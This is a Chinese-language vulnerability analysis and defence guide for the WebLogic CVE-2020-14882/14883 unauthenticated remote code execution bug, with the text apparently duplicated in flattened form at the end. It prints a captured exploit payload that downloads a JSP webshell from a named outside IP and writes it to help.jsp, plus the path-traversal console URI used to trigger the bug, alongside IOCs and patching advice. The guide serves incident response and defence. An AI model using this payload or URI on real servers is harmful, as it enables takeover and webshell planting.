近期基于Weblogic未授权命令执行的漏洞分析
字数 1154 2025-08-15 21:32:33

Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)分析与防护指南

漏洞概述

漏洞编号

  • CVE-2020-14882
  • CVE-2020-14883

漏洞等级

高危,CVSS评分9.8

漏洞影响

这两个漏洞组合利用可使未经授权的攻击者绕过WebLogic后台登录等限制,最终实现远程代码执行,完全接管WebLogic服务器。

受影响版本

  • 10.3.6.0.0
  • 12.1.3.0.0
  • 12.2.1.3.0
  • 12.2.1.4.0
  • 14.1.1.0.0

漏洞发展时间线

  • 2020年10月21日:Oracle官方发布包含该漏洞在内的数百个组件高危漏洞公告
  • 2020年10月29日:漏洞EXP公开
  • 随后出现大量利用该漏洞的挖矿活动、Webshell上传等攻击行为

漏洞利用分析

典型攻击Payload示例

handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22java.nio.file.Files.copy%28new+java.net.URL%28%27http%3A%2F%2F46.183.223.11%2F2908.txt%27%29.openStream%28%29%2C+new+java.io.File%28%27..%2F..%2F..%2Fwlserver%2Fserver%2Flib%2Fconsoleapp%2Fconsolehelp%2Fhelp.jsp%27%29.toPath%28%29%2C+java.nio.file.StandardCopyOption.REPLACE_EXISTING%29%3B%22%29%3B

URL解码后:

handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.nio.file.Files.copy(new java.net.URL('http://46.183.223.11/2908.txt').openStream(), new java.io.File('../../../wlserver/server/lib/consoleapp/consolehelp/help.jsp').toPath(), java.nio.file.StandardCopyOption.REPLACE_EXISTING);");

攻击流程解析

  1. 利用漏洞构造特殊请求绕过认证
  2. 从远程C2服务器(http://46.183.223.11/2908.txt)下载Webshell
  3. 将Webshell写入Weblogic服务器特定路径(help.jsp)
  4. 通过访问植入的Webshell获取服务器控制权

常见利用URI

/console/images/%252e%252e%252fconsole.portal?_nfpb=false&_pageLable=

Webshell分析

样本特征

  • 文件来源:http://46.183.223.11/2908.txt
  • 文件类型:JSP Webshell
  • 作者标识:"Author:God"
  • 访问密码:MD5(f6f5489634f0b7ffaf80160f6d1366ec)

功能模块

  1. 系统信息获取
  2. 目录浏览
  3. 文件上传/下载/编辑
  4. 命令执行

防护建议

官方修复方案

  • 下载并安装Oracle官方发布的最新补丁
  • 补丁获取:需持有正版许可账号,登录https://support.oracle.com下载

应急响应措施

  1. 检查服务器是否存在2908.txt文件并删除
  2. 封锁恶意IP:46.183.223.11
  3. 检查以下路径是否存在异常文件: 
    ../wlserver/server/lib/consoleapp/consolehelp/help.jsp
  4. 监控相关URI访问日志: 
    /console/images/%252e%252e%252fconsole.portal

长期防护策略

  1. 及时关注Oracle官方安全公告
  2. 建立漏洞预警机制,对新披露的高危漏洞快速响应
  3. 限制Weblogic控制台的网络访问权限
  4. 加强服务器文件完整性监控

IOC(威胁指标)

相关CVE

  • CVE-2020-14882
  • CVE-2020-14883

恶意URL

  • http://46.183.223.11/2908.txt

文件哈希

  • MD5: 62138c4884af2f086b2dc46beedc24ec

总结

Weblogic未授权命令执行漏洞组合利用难度低但危害极大,攻击者可以完全接管服务器。随着EXP的公开,已观察到大量实际攻击案例,包括Webshell植入和挖矿活动。建议受影响用户立即采取防护措施,加强系统监控,防范潜在风险。

Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)分析与防护指南 漏洞概述 漏洞编号 CVE-2020-14882 CVE-2020-14883 漏洞等级 高危,CVSS评分9.8 漏洞影响 这两个漏洞组合利用可使未经授权的攻击者绕过WebLogic后台登录等限制,最终实现远程代码执行,完全接管WebLogic服务器。 受影响版本 10.3.6.0.0 12.1.3.0.0 12.2.1.3.0 12.2.1.4.0 14.1.1.0.0 漏洞发展时间线 2020年10月21日:Oracle官方发布包含该漏洞在内的数百个组件高危漏洞公告 2020年10月29日:漏洞EXP公开 随后出现大量利用该漏洞的挖矿活动、Webshell上传等攻击行为 漏洞利用分析 典型攻击Payload示例 URL解码后: 攻击流程解析 利用漏洞构造特殊请求绕过认证 从远程C2服务器(http://46.183.223.11/2908.txt)下载Webshell 将Webshell写入Weblogic服务器特定路径(help.jsp) 通过访问植入的Webshell获取服务器控制权 常见利用URI Webshell分析 样本特征 文件来源:http://46.183.223.11/2908.txt 文件类型:JSP Webshell 作者标识:"Author:God" 访问密码:MD5(f6f5489634f0b7ffaf80160f6d1366ec) 功能模块 系统信息获取 目录浏览 文件上传/下载/编辑 命令执行 防护建议 官方修复方案 下载并安装Oracle官方发布的最新补丁 补丁获取:需持有正版许可账号,登录https://support.oracle.com下载 应急响应措施 检查服务器是否存在2908.txt文件并删除 封锁恶意IP:46.183.223.11 检查以下路径是否存在异常文件: 监控相关URI访问日志: 长期防护策略 及时关注Oracle官方安全公告 建立漏洞预警机制,对新披露的高危漏洞快速响应 限制Weblogic控制台的网络访问权限 加强服务器文件完整性监控 IOC(威胁指标) 相关CVE CVE-2020-14882 CVE-2020-14883 恶意URL http://46.183.223.11/2908.txt 文件哈希 MD5: 62138c4884af2f086b2dc46beedc24ec 总结 Weblogic未授权命令执行漏洞组合利用难度低但危害极大,攻击者可以完全接管服务器。随着EXP的公开,已观察到大量实际攻击案例,包括Webshell植入和挖矿活动。建议受影响用户立即采取防护措施,加强系统监控,防范潜在风险。